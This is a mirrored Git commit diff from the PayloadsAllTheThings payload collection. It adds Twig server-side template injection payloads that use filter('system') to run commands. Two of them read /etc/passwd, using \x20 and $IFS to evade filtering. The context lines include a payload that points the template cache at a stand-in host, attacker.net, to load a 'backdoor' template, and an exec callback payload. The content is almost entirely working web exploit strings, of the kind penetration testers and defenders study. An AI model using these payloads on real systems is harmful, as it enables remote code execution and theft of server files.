mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 12:55:27 +00:00
Merge pull request #173 from SakiiR/sakiir
Added filter(system) twig RCE
commit
b5cc379c4b
@ -157,6 +157,9 @@ $output = $twig > render (
|
|||||||
{{self}}
|
{{self}}
|
||||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
|
{{['id']|filter('system')}}
|
||||||
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
```
|
```
|
||||||
|
|
||||||
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
||||||
|